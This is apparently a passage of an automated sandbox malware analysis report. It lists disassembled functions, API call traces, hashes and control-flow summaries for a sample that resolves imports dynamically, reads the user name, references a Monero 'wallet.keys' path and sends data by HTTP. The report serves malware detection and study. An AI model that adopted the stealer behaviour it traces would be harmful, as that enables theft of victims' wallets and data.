                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateHeapProtectVirtual
                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: 3069bc3d513d704ecea586b57cfcc8699ee1fee00edd2517562e301d542531be
                  • Instruction ID: 043819b6cf9ca9f037ca0024a01dc3af61fb4fe6afdae2d63229073b4f101c8d
                  • Opcode Fuzzy Hash: 3069bc3d513d704ecea586b57cfcc8699ee1fee00edd2517562e301d542531be
                  • Instruction Fuzzy Hash: 664146607E36146AE73ABBE48CC2F9D7666DF47718F519A48FA0053282CBB0B5A04572
                  Function 002A4880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 2a4880-2a4942 call 2ba7a0 call 2a47b0 call 2ba740 * 5 InternetOpenA StrCmpCA 816 2a494b-2a494f 801->816 817 2a4944 801->817 818 2a4ecb-2a4ef3 InternetCloseHandle call 2baad0 call 2a9ac0 816->818 819 2a4955-2a4acd call 2b8b60 call 2ba920 call 2ba8a0 call 2ba800 * 2 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba920 call 2ba8a0 call 2ba800 * 2 InternetConnectA 816->819 817->816 829 2a4f32-2a4fa2 call 2b8990 * 2 call 2ba7a0 call 2ba800 * 8 818->829 830 2a4ef5-2a4f2d call 2ba820 call 2ba9b0 call 2ba8a0 call 2ba800 818->830 819->818 905 2a4ad3-2a4ad7 819->905 830->829 906 2a4ad9-2a4ae3 905->906 907 2a4ae5 905->907 908 2a4aef-2a4b22 HttpOpenRequestA 906->908 907->908 909 2a4b28-2a4e28 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba9b0 call 2ba8a0 call 2ba800 call 2ba920 call 2ba8a0 call 2ba800 call 2ba740 call 2ba920 * 2 call 2ba8a0 call 2ba800 * 2 call 2baad0 lstrlen call 2baad0 * 2 lstrlen call 2baad0 HttpSendRequestA 908->909 910 2a4ebe-2a4ec5 InternetCloseHandle 908->910 1021 2a4e32-2a4e5c InternetReadFile 909->1021 910->818 1022 2a4e5e-2a4e65 1021->1022 1023 2a4e67-2a4eb9 InternetCloseHandle call 2ba800 1021->1023 1022->1023 1024 2a4e69-2a4ea7 call 2ba9b0 call 2ba8a0 call 2ba800 1022->1024 1023->910 1024->1021
                  APIs
                    • Part of subcall function 002BA7A0: lstrcpy.KERNEL32(?,00000000), ref: 002BA7E6
                    • Part of subcall function 002A47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 002A4839
                    • Part of subcall function 002A47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 002A4849
                    • Part of subcall function 002BA740: lstrcpy.KERNEL32(002C0E17,00000000), ref: 002BA788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002A4915
                  • StrCmpCA.SHLWAPI(?,00D5FCE0), ref: 002A493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002A4ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,002C0DDB,00000000,?,?,00000000,?,",00000000,?,00D5FC60), ref: 002A4DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 002A4E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 002A4E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002A4E49
                  • InternetCloseHandle.WININET(00000000), ref: 002A4EAD
                  • InternetCloseHandle.WININET(00000000), ref: 002A4EC5
                  • HttpOpenRequestA.WININET(00000000,00D5FCD0,?,00D5F350,00000000,00000000,00400100,00000000), ref: 002A4B15
                    • Part of subcall function 002BA9B0: lstrlen.KERNEL32(?,00D58908,?,\Monero\wallet.keys,002C0E17), ref: 002BA9C5
                    • Part of subcall function 002BA9B0: lstrcpy.KERNEL32(00000000), ref: 002BAA04
                    • Part of subcall function 002BA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 002BAA12
                    • Part of subcall function 002BA8A0: lstrcpy.KERNEL32(?,002C0E17), ref: 002BA905
                    • Part of subcall function 002BA920: lstrcpy.KERNEL32(00000000,?), ref: 002BA972
                    • Part of subcall function 002BA920: lstrcat.KERNEL32(00000000), ref: 002BA982
                  • InternetCloseHandle.WININET(00000000), ref: 002A4ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 25b43093f0e1a46f7ec6b2619e08124b11973971b5c016da81010fc2b4e9fccd
                  • Instruction ID: 2d63dda54827f003fd068fc8c20c62a339e4f8347bd848445dab2a403f29d359
                  • Opcode Fuzzy Hash: 25b43093f0e1a46f7ec6b2619e08124b11973971b5c016da81010fc2b4e9fccd
                  • Instruction Fuzzy Hash: 2C121071920118BADB15EB90DCA2FEEB338BF15340F5041A9B10672492EF706F69CF62
                  Function 002B7850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,002A11B7), ref: 002B7880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 002B7887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 002B789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: cd55d9f223bc0c94cd55496ad6c1544531e24c201001aa74cf7063dd1e1a371e
                  • Instruction ID: 1c249197980332d4e64892b66d725c5147af25d8d79ac341c2982a18e78befb9
                  • Opcode Fuzzy Hash: cd55d9f223bc0c94cd55496ad6c1544531e24c201001aa74cf7063dd1e1a371e
                  • Instruction Fuzzy Hash: 1AF04FB1D44248ABCB00DF98DD89BAEBBB8FB05711F10026AFA05A2680C77465148BA2
                  Function 002A1160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: a915f370553f793dd2308fa8ffb20c27d1e730e40d35e4f011bc5a2b9bf29fd5
                  • Instruction ID: 4bf5812a6cc3b17a47beb2a3dbe27251c8f96fb1ca66a904ae4880cbd2528370
                  • Opcode Fuzzy Hash: a915f370553f793dd2308fa8ffb20c27d1e730e40d35e4f011bc5a2b9bf29fd5
                  • Instruction Fuzzy Hash: 8AD05E7490030CDBCB00DFE0D8896DDBB78FB08322F000564E90562340EA30A4A1CAAA
                  Function 002B9C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 2b9c10-2b9c1a 634 2b9c20-2ba031 GetProcAddress * 43 633->634 635 2ba036-2ba0ca LoadLibraryA * 8 633->635 634->635 636 2ba0cc-2ba141 GetProcAddress * 5 635->636 637 2ba146-2ba14d 635->637 636->637 638 2ba153-2ba211 GetProcAddress * 8 637->638 639 2ba216-2ba21d 637->639 638->639 640 2ba298-2ba29f 639->640 641 2ba21f-2ba293 GetProcAddress * 5 639->641 642 2ba337-2ba33e 640->642 643 2ba2a5-2ba332 GetProcAddress * 6 640->643 641->640 644 2ba41f-2ba426 642->644 645 2ba344-2ba41a GetProcAddress * 9 642->645 643->642 646 2ba428-2ba49d GetProcAddress * 5 644->646 647 2ba4a2-2ba4a9 644->647 645->644 646->647 648 2ba4ab-2ba4d7 GetProcAddress * 2 647->648 649 2ba4dc-2ba4e3 647->649 648->649 650 2ba515-2ba51c 649->650 651 2ba4e5-2ba510 GetProcAddress * 2 649->651 652 2ba612-2ba619 650->652 653 2ba522-2ba60d GetProcAddress * 10 650->653 651->650 654 2ba61b-2ba678 GetProcAddress * 4 652->654 655 2ba67d-2ba684 652->655 653->652 654->655 656 2ba69e-2ba6a5 655->656 657 2ba686-2ba699 GetProcAddress 655->657 658 2ba708-2ba709 656->658 659 2ba6a7-2ba703 GetProcAddress * 4 656->659 657->656 659->658
                  APIs
                  • GetProcAddress.KERNEL32(76210000,00D456E8), ref: 002B9C2D
                  • GetProcAddress.KERNEL32(76210000,00D45548), ref: 002B9C45
                  • GetProcAddress.KERNEL32(76210000,00D58F98), ref: 002B9C5E
                  • GetProcAddress.KERNEL32(76210000,00D58D70), ref: 002B9C76
                  • GetProcAddress.KERNEL32(76210000,00D58D88), ref: 002B9C8E
                  • GetProcAddress.KERNEL32(76210000,00D5DB20), ref: 002B9CA7
                  • GetProcAddress.KERNEL32(76210000,00D4A630), ref: 002B9CBF
                  • GetProcAddress.KERNEL32(76210000,00D5DC70), ref: 002B9CD7
                  • GetProcAddress.KERNEL32(76210000,00D5DB08), ref: 002B9CF0
                  • GetProcAddress.KERNEL32(76210000,00D5DC58), ref: 002B9D08
                  • GetProcAddress.KERNEL32(76210000,00D5DC10), ref: 002B9D20
                  • GetProcAddress.KERNEL32(76210000,00D45688), ref: 002B9D39
                  • GetProcAddress.KERNEL32(76210000,00D45568), ref: 002B9D51
                  • GetProcAddress.KERNEL32(76210000,00D456A8), ref: 002B9D69
                  • GetProcAddress.KERNEL32(76210000,00D456C8), ref: 002B9D82
                  • GetProcAddress.KERNEL32(76210000,00D5DB80), ref: 002B9D9A
                  • GetProcAddress.KERNEL32(76210000,00D5DC40), ref: 002B9DB2
                  • GetProcAddress.KERNEL32(76210000,00D4A8B0), ref: 002B9DCB
                  • GetProcAddress.KERNEL32(76210000,00D45348), ref: 002B9DE3
                  • GetProcAddress.KERNEL32(76210000,00D5DD78), ref: 002B9DFB
                  • GetProcAddress.KERNEL32(76210000,00D5DC88), ref: 002B9E14
                  • GetProcAddress.KERNEL32(76210000,00D5DB98), ref: 002B9E2C
                  • GetProcAddress.KERNEL32(76210000,00D5DBB0), ref: 002B9E44
                  • GetProcAddress.KERNEL32(76210000,00D455A8), ref: 002B9E5D
                  • GetProcAddress.KERNEL32(76210000,00D5DAD8), ref: 002B9E75
                  • GetProcAddress.KERNEL32(76210000,00D5DD30), ref: 002B9E8D
                  • GetProcAddress.KERNEL32(76210000,00D5DAF0), ref: 002B9EA6
                  • GetProcAddress.KERNEL32(76210000,00D5DBC8), ref: 002B9EBE
                  • GetProcAddress.KERNEL32(76210000,00D5DCD0), ref: 002B9ED6
                  • GetProcAddress.KERNEL32(76210000,00D5DCB8), ref: 002B9EEF
                  • GetProcAddress.KERNEL32(76210000,00D5DCE8), ref: 002B9F07
                  • GetProcAddress.KERNEL32(76210000,00D5DC28), ref: 002B9F1F
                  • GetProcAddress.KERNEL32(76210000,00D5DCA0), ref: 002B9F38
                  • GetProcAddress.KERNEL32(76210000,00D4FD78), ref: 002B9F50
                  • GetProcAddress.KERNEL32(76210000,00D5DDA8), ref: 002B9F68
                  • GetProcAddress.KERNEL32(76210000,00D5DBF8), ref: 002B9F81
                  • GetProcAddress.KERNEL32(76210000,00D45368), ref: 002B9F99
                  • GetProcAddress.KERNEL32(76210000,00D5DD00), ref: 002B9FB1
                  • GetProcAddress.KERNEL32(76210000,00D455C8), ref: 002B9FCA
                  • GetProcAddress.KERNEL32(76210000,00D5DD18), ref: 002B9FE2
                  • GetProcAddress.KERNEL32(76210000,00D5DAC0), ref: 002B9FFA
                  • GetProcAddress.KERNEL32(76210000,00D45588), ref: 002BA013
                  • GetProcAddress.KERNEL32(76210000,00D455E8), ref: 002BA02B
                  • LoadLibraryA.KERNEL32(00D5DBE0,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA03D
                  • LoadLibraryA.KERNEL32(00D5DD48,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA04E
                  • LoadLibraryA.KERNEL32(00D5DD60,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA060
                  • LoadLibraryA.KERNEL32(00D5DD90,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA072
                  • LoadLibraryA.KERNEL32(00D5DB38,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA083
                  • LoadLibraryA.KERNEL32(00D5DB50,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA095
                  • LoadLibraryA.KERNEL32(00D5DB68,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA0A7
                  • LoadLibraryA.KERNEL32(00D5DF70,?,002B5CA3,002C0AEB,?,?,?,?,?,?,?,?,?,?,002C0AEA,002C0AE3), ref: 002BA0B8
                  • GetProcAddress.KERNEL32(751E0000,00D45168), ref: 002BA0DA
                  • GetProcAddress.KERNEL32(751E0000,00D5DE08), ref: 002BA0F2
                  • GetProcAddress.KERNEL32(751E0000,00D58AF8), ref: 002BA10A
                  • GetProcAddress.KERNEL32(751E0000,00D5DDC0), ref: 002BA123
                  • GetProcAddress.KERNEL32(751E0000,00D45068), ref: 002BA13B
                  • GetProcAddress.KERNEL32(73FB0000,00D4A928), ref: 002BA160
                  • GetProcAddress.KERNEL32(73FB0000,00D452C8), ref: 002BA179
                  • GetProcAddress.KERNEL32(73FB0000,00D4A478), ref: 002BA191
                  • GetProcAddress.KERNEL32(73FB0000,00D5DEB0), ref: 002BA1A9
                  • GetProcAddress.KERNEL32(73FB0000,00D5DF58), ref: 002BA1C2
                  • GetProcAddress.KERNEL32(73FB0000,00D45088), ref: 002BA1DA
                  • GetProcAddress.KERNEL32(73FB0000,00D452E8), ref: 002BA1F2
                  • GetProcAddress.KERNEL32(73FB0000,00D5DEF8), ref: 002BA20B
                  • GetProcAddress.KERNEL32(753A0000,00D451E8), ref: 002BA22C
                  • GetProcAddress.KERNEL32(753A0000,00D44FC8), ref: 002BA244
                  • GetProcAddress.KERNEL32(753A0000,00D5DE98), ref: 002BA25D
                  • GetProcAddress.KERNEL32(753A0000,00D5DE20), ref: 002BA275
                  • GetProcAddress.KERNEL32(753A0000,00D450A8), ref: 002BA28D
                  • GetProcAddress.KERNEL32(76310000,00D4A770), ref: 002BA2B3
                  • GetProcAddress.KERNEL32(76310000,00D4A7C0), ref: 002BA2CB
                  • GetProcAddress.KERNEL32(76310000,00D5DDD8), ref: 002BA2E3
                  • GetProcAddress.KERNEL32(76310000,00D451C8), ref: 002BA2FC
                  • GetProcAddress.KERNEL32(76310000,00D45208), ref: 002BA314
                  • GetProcAddress.KERNEL32(76310000,00D4A888), ref: 002BA32C
                  • GetProcAddress.KERNEL32(76910000,00D5DF10), ref: 002BA352
                  • GetProcAddress.KERNEL32(76910000,00D45228), ref: 002BA36A
                  • GetProcAddress.KERNEL32(76910000,00D58BA8), ref: 002BA382
                  • GetProcAddress.KERNEL32(76910000,00D5DE38), ref: 002BA39B
                  • GetProcAddress.KERNEL32(76910000,00D5DEC8), ref: 002BA3B3
                  • GetProcAddress.KERNEL32(76910000,00D45028), ref: 002BA3CB
                  • GetProcAddress.KERNEL32(76910000,00D45008), ref: 002BA3E4
                  • GetProcAddress.KERNEL32(76910000,00D5DE80), ref: 002BA3FC
                  • GetProcAddress.KERNEL32(76910000,00D5DDF0), ref: 002BA414
                  • GetProcAddress.KERNEL32(75B30000,00D450C8), ref: 002BA436
                  • GetProcAddress.KERNEL32(75B30000,00D5DE50), ref: 002BA44E
                  • GetProcAddress.KERNEL32(75B30000,00D5DF28), ref: 002BA466
                  • GetProcAddress.KERNEL32(75B30000,00D5DEE0), ref: 002BA47F
                  • GetProcAddress.KERNEL32(75B30000,00D5DF40), ref: 002BA497
                  • GetProcAddress.KERNEL32(75670000,00D45268), ref: 002BA4B8
                  • GetProcAddress.KERNEL32(75670000,00D450E8), ref: 002BA4D1
                  • GetProcAddress.KERNEL32(76AC0000,00D45248), ref: 002BA4F2
                  • GetProcAddress.KERNEL32(76AC0000,00D5DE68), ref: 002BA50A
                  • GetProcAddress.KERNEL32(6F4E0000,00D45108), ref: 002BA530
                  • GetProcAddress.KERNEL32(6F4E0000,00D44FA8), ref: 002BA548
                  • GetProcAddress.KERNEL32(6F4E0000,00D45128), ref: 002BA560
                  • GetProcAddress.KERNEL32(6F4E0000,00D5D910), ref: 002BA579
                  • GetProcAddress.KERNEL32(6F4E0000,00D45288), ref: 002BA591
                  • GetProcAddress.KERNEL32(6F4E0000,00D45188), ref: 002BA5A9
                  • GetProcAddress.KERNEL32(6F4E0000,00D452A8), ref: 002BA5C2
                  • GetProcAddress.KERNEL32(6F4E0000,00D45148), ref: 002BA5DA
                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 002BA5F1
                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 002BA607
                  • GetProcAddress.KERNEL32(75AE0000,00D5D880), ref: 002BA629
                  • GetProcAddress.KERNEL32(75AE0000,00D58B28), ref: 002BA641
                  • GetProcAddress.KERNEL32(75AE0000,00D5DAA8), ref: 002BA659
                  • GetProcAddress.KERNEL32(75AE0000,00D5DA60), ref: 002BA672
                  • GetProcAddress.KERNEL32(76300000,00D45308), ref: 002BA693
                  • GetProcAddress.KERNEL32(6FE10000,00D5DA78), ref: 002BA6B4
                  • GetProcAddress.KERNEL32(6FE10000,00D45328), ref: 002BA6CD
                  • GetProcAddress.KERNEL32(6FE10000,00D5DA00), ref: 002BA6E5
                  • GetProcAddress.KERNEL32(6FE10000,00D5D838), ref: 002BA6FD
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
